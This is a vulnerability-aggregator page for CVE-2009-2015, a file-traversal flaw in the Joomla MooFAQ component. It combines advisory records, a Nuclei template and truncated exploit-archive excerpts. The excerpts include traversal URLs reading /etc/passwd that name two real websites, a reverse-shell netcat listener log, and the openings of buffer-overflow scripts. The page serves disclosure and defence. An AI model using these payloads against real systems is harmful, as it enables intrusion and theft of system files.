CVE-2009-2015
published 2009-06-09CVE-2009-2015: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.51%
92.9th percentile
Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ideal | com_moofaq | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.3HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fqvc-89p2-jw8f: Directory traversal vulnerability in includes/file_includer
ghsa_unreviewed·2022-05-02
CVE-2009-2015 [HIGH] CWE-22 GHSA-fqvc-89p2-jw8f: Directory traversal vulnerability in includes/file_includer
Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
OSV
ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities
osv·2017-07-25·CVSS 7.3
CVE-2009-5147 ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities
ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities
It was discovered that Ruby DL::dlopen incorrectly handled opening
libraries. An attacker could possibly use this issue to open libraries with
tainted names. This issue only applied to Ubuntu 14.04 LTS. (CVE-2009-5147)
Tony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby
OpenSSL extension incorrectly handled hostname wildcard matching. This
issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)
Christian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly
handled certain crafted strings. An attacker could use this issue to cause
a denial of service, or possibly execute arbitrary code. This issue only
applied to Ubuntu 14.04 LTS. (CVE-2015-7551)
It was discovered that Ruby Net::SMTP incorrectly handled CRLF sequ
Red Hat
kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
vendor_redhat·2025-06-18·CVSS 5.5
CVE-2022-50228 [MEDIUM] kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
In the Linux kernel, the following vulnerability has been resolved:
KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
Don't BUG/WARN on interrupt injection due to GIF being cleared,
since it's trivial for userspace to force the situation via
KVM_SET_VCPU_EVENTS (even if having at least a WARN there would be correct
for KVM internally generated injections).
kernel BUG at arch/x86/kvm/svm/svm.c:3386!
invalid opcode: 0000 [#1] SMP
CPU: 15 PID: 926 Comm: smm_test Not tainted 5.17.0-rc3+ #264
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:svm_inject_irq+0xab/0xb0 [kvm_amd]
Code: 0b 0f 1f 00 0f 1f 44 00 00 80 3d ac b3 01 00 00 55 48 89 f5 53
RSP: 0018:ffffc90000b37d88 EFL
Red Hat
kernel: cxl/port: Hold port reference until decoder release
vendor_redhat·2025-02-26·CVSS 7.8
CVE-2022-49223 [HIGH] CWE-416 kernel: cxl/port: Hold port reference until decoder release
kernel: cxl/port: Hold port reference until decoder release
In the Linux kernel, the following vulnerability has been resolved:
cxl/port: Hold port reference until decoder release
KASAN + DEBUG_KOBJECT_RELEASE reports a potential use-after-free in
cxl_decoder_release() where it goes to reference its parent, a cxl_port,
to free its id back to port->decoder_ida.
BUG: KASAN: use-after-free in to_cxl_port+0x18/0x90 [cxl_core]
Read of size 8 at addr ffff888119270908 by task kworker/35:2/379
CPU: 35 PID: 379 Comm: kworker/35:2 Tainted: G OE 5.17.0-rc2+ #198
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Workqueue: events kobject_delayed_cleanup
Call Trace:
dump_stack_lvl+0x59/0x73
print_address_description.constprop.0+0x1f/0x150
? to_cxl_port+0x18/0x90 [cxl_core]
kas
Red Hat
kernel: tpm: efi: Use local variable for calculating final log size
vendor_redhat·2024-02-27·CVSS 5.5
CVE-2021-46951 [MEDIUM] CWE-191 kernel: tpm: efi: Use local variable for calculating final log size
kernel: tpm: efi: Use local variable for calculating final log size
In the Linux kernel, the following vulnerability has been resolved:
tpm: efi: Use local variable for calculating final log size
When tpm_read_log_efi is called multiple times, which happens when
one loads and unloads a TPM2 driver multiple times, then the global
variable efi_tpm_final_log_size will at some point become a negative
number due to the subtraction of final_events_preboot_size occurring
each time. Use a local variable to avoid this integer underflow.
The following issue is now resolved:
Mar 8 15:35:12 hibinst kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Mar 8 15:35:12 hibinst kernel: Workqueue: tpm-vtpm vtpm_proxy_work [tpm_vtpm_proxy]
Mar 8 15:35:12 hibinst kernel: RIP: 001
Red Hat
ruby: DL:: dlopen could open a library with tainted library name
vendor_redhat·2009-05-11·CVSS 7.3
CVE-2015-7551 [HIGH] CWE-267 ruby: DL:: dlopen could open a library with tainted library name
ruby: DL:: dlopen could open a library with tainted library name
The Fiddle::Handle implementation in ext/fiddle/handle.c in Ruby before 2.0.0-p648, 2.1 before 2.1.8, and 2.2 before 2.2.4, as distributed in Apple OS X before 10.11.4 and other products, mishandles tainting, which allows context-dependent attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string, related to the DL module and the libffi library. NOTE: this vulnerability exists because of a CVE-2009-5147 regression.
Statement: Red Hat Product Security has rated this issue as having Low security
impact. This issue is not currently planned to be addressed in future updates.
For additional information, refer to the Issue Severity Classification:
https://access.redhat.com/security/
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
RM Downloader 2.7.5.400 - Local Buffer Overflow
exploitdb·2015-03-26
CVE-2009-1646 RM Downloader 2.7.5.400 - Local Buffer Overflow
RM Downloader 2.7.5.400 - Local Buffer Overflow
---
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png
from struct import pack
file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#ht
Exploit-DB
phpMyBackupPro - Arbitrary File Download
exploitdb·2009-11-16
CVE-2015-4181 phpMyBackupPro - Arbitrary File Download
phpMyBackupPro - Arbitrary File Download
---
################################################################################
Arbitrary File Download in phpMyBackupPro
Name Arbitrary File Download in phpMyBackupPro
Systems Affected phpMyBackupPro v 2.1 and possibly earlier versions
site http://www.phpmybackuppro.net
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################
############
1. OVERVIEW
############
phpMyBackupPro is a web-based MySQL backup application in PHP.
You can schedule backups, download, email or upload them with FTP and backup whole file directories.
Zip and gzip compression, easy interface and installation. Many languages and online help!
###############
2. DESCRIPTION
############
Exploit-DB
Steam 54/894 - Local Privilege Escalation
exploitdb·2009-08-07
CVE-2015-7985 Steam 54/894 - Local Privilege Escalation
Steam 54/894 - Local Privilege Escalation
---
Steam (Multiple .exe's) Local Privilage Escalation
By:
MrDoug
mrdoug13[at]gmail[dot]com
Version Info:
Steam windows client
Built: Jun 30 2009, at 13:29:32
Steam API: v008
Steam Package versions: 54/894
Greetz:
Slappywag, Doomchip, Bolo, Eliwood, and the rest.
Special Thanks:
Jeremy Brown and Nine:Situations:Group...
Their work led me to this.
The latest Steam client, (and other Steam related executables)
suffer the same privilage escelation issue we saw in Adobe Acrobat NOS
the other day (http://milw0rm.com/exploits/9199). This is particularly
bad becuase, by default, Steam starts atomaticly. That means that as
soon as an administrator logs in... game over.
POC:
C:\>cacls "C:\Program Files\Steam\Steam.exe"
C:\Program Files\Steam\Stea
Exploit-DB
Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
exploitdb·2009-06-08
CVE-2009-2015 Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
---
Joomla Component MooFAQ Local File Inclusion Vulnerability
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
FAQ Component using mooTools
20 July 2007
1.0
1.0.13
Douglas
Nuclei
Joomla! MooFAQ 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2009-2015 [HIGH] Joomla! MooFAQ 1.0 - Local File Inclusion
Joomla! MooFAQ 1.0 - Local File Inclusion
Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
Template:
id: CVE-2009-2015
info:
name: Joomla! MooFAQ 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
remediation: |
Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
reference:
- https://www.exploit-db.com
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
bugzilla·2025-02-27
CVE-2025-21740 CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
When waking a VM's NX huge page recovery thread, ensure the thread is
actually alive before trying to wake it. Now that the thread is spawned
on-demand during KVM_RUN, a VM without a recovery thread is reachable via
the related module params.
BUG: kernel NULL pointer dereference, address: 0000000000000040
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:vhost_task_wake+0x5/0x10
Call Trace:
set_nx_huge_pages+0xcc/0x1e0 [kvm]
param_att
Bugzilla
CVE-2022-49223 kernel: cxl/port: Hold port reference until decoder release
bugzilla·2025-02-26·CVSS 7.8
CVE-2022-49223 [HIGH] CVE-2022-49223 kernel: cxl/port: Hold port reference until decoder release
CVE-2022-49223 kernel: cxl/port: Hold port reference until decoder release
In the Linux kernel, the following vulnerability has been resolved:
cxl/port: Hold port reference until decoder release
KASAN + DEBUG_KOBJECT_RELEASE reports a potential use-after-free in
cxl_decoder_release() where it goes to reference its parent, a cxl_port,
to free its id back to port->decoder_ida.
BUG: KASAN: use-after-free in to_cxl_port+0x18/0x90 [cxl_core]
Read of size 8 at addr ffff888119270908 by task kworker/35:2/379
CPU: 35 PID: 379 Comm: kworker/35:2 Tainted: G OE 5.17.0-rc2+ #198
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Workqueue: events kobject_delayed_cleanup
Call Trace:
dump_stack_lvl+0x59/0x73
print_address_description.constprop.0+0x1f/0x150
? to_cxl_port+0x18/
Bugzilla
CVE-2009-5145 zope: Cross-site scripting (XSS) in ZMI pages through manage_tabs_message()
bugzilla·2017-08-21·CVSS 6.1
CVE-2009-5145 [MEDIUM] CVE-2009-5145 zope: Cross-site scripting (XSS) in ZMI pages through manage_tabs_message()
CVE-2009-5145 zope: Cross-site scripting (XSS) in ZMI pages through manage_tabs_message()
Cross-site scripting (XSS) vulnerability in ZMI pages that use the manage_tabs_message in Zope 2.11.4, 2.11.2, 2.10.9, 2.10.7, 2.10.6, 2.10.5, 2.10.4, 2.10.2, 2.10.1, 2.12.
Upstream patch:
https://github.com/zopefoundation/Zope/commit/2abdf14620f146857dc8e3ffd2b6a754884c331d
References:
http://www.openwall.com/lists/oss-security/2015/03/02/7
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5145
Bugzilla
CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
bugzilla·2015-07-31·CVSS 7.3
CVE-2009-5147 [HIGH] CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
DL::dlopen could open a library with tainted library name even if $SAFE > 0. This vulnerability affects Ruby versions 1.8, 1.9, 2.1, 2.2.
Upstream patch:
https://github.com/ruby/ruby/commit/4600cf725a86ce31266153647ae5aa1197b1215b
Additional information and CVE assignment:
http://seclists.org/oss-sec/2015/q3/222
Discussion:
Created ruby tracking bugs for this issue:
Affects: fedora-all [bug 1248937]
---
(In reply to Adam Mariš from comment #0)
> DL::dlopen could open a library with tainted library name even if $SAFE > 0.
> This vulnerability affects Ruby versions 1.8, 1.9, 2.1, 2.2.
This is hardly true, since DL was removed from Ruby 2.2:
https://github.com/ruby/ruby/commit/07308c4d30b8c5
Bugzilla
CVE-2015-3008 asterisk: TLS Certificate Common name NULL byte exploit
bugzilla·2015-04-09·CVSS 4.3
CVE-2015-3008 [MEDIUM] CVE-2015-3008 asterisk: TLS Certificate Common name NULL byte exploit
CVE-2015-3008 asterisk: TLS Certificate Common name NULL byte exploit
The following flaw was found in asterisk:
When Asterisk registers to a SIP TLS device and and verifies the server, Asterisk will accept signed certificates that match a common name other than the one Asterisk is expecting if the signed certificate has a common name containing a null byte after the portion of the common name that Asterisk expected. For example, if Asterisk is trying to register to www.domain.com, Asterisk will accept certificates of the form www.domain.com\x00www.someotherdomain.com - for more information on this exploit, see https://fotisl.com/blog/2009/10/the-null-certificate-prefix-bug/
This issue is fixed in asterisk versions: 1.8.32.3, 11.17.1, 12.8.2, 13.3.2
Upstream advisory:
http://downloads.
Bugzilla
CVE-2009-5146 openssl: memory leak in hostname TLS extension
bugzilla·2015-03-18
CVE-2009-5146 CVE-2009-5146 openssl: memory leak in hostname TLS extension
CVE-2009-5146 openssl: memory leak in hostname TLS extension
A memory leak flaw was fix in the hostname TLS extension:
https://github.com/openssl/openssl/commit/7587347bc48e7e8a1e800e48bb0a658f1557c424
This flaw was introduced with the backport of the TLS extension code first introduced in version 0.9.8k of openssl.
Additional information:
http://seclists.org/oss-sec/2015/q1/856
Discussion:
Statement:
This issue did not affect any versions of OpenSSL as shipped with Red Hat Enterprise Linux 5, 6, and 7.
Bugzilla
CVE-2009-5144 CVE-2015-2091 mod_gnutls: GnuTLSClientVerify require is ignored in directory and server context
bugzilla·2015-02-27·CVSS 7.5
CVE-2009-5144 [HIGH] CVE-2009-5144 CVE-2015-2091 mod_gnutls: GnuTLSClientVerify require is ignored in directory and server context
CVE-2009-5144 CVE-2015-2091 mod_gnutls: GnuTLSClientVerify require is ignored in directory and server context
It was reported that under certain conditions mod_gnutls ignores "GnuTLSClientVerify require" when specified in directory [1] and server [2] context.
Suggested commit that fixes [2] is:
https://github.com/airtower-luna/mod_gnutls/commit/5a8a32bbfb8a83fe6358c5c31c443325a7775fc2
Patch for [1] is attaced in the corresponding bugreport.
[1]: http://issues.outoforder.cc/view.php?id=93
[2]: https://bugs.debian.org/578663
Discussion:
Created mod_gnutls tracking bugs for this issue:
Affects: fedora-all [bug 1197128]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to th
http://secunia.com/advisories/35370http://www.securityfocus.com/bid/35259http://www.vupen.com/english/advisories/2009/1530https://www.exploit-db.com/exploits/8898http://secunia.com/advisories/35370http://www.securityfocus.com/bid/35259http://www.vupen.com/english/advisories/2009/1530https://www.exploit-db.com/exploits/8898
2009-06-09
Published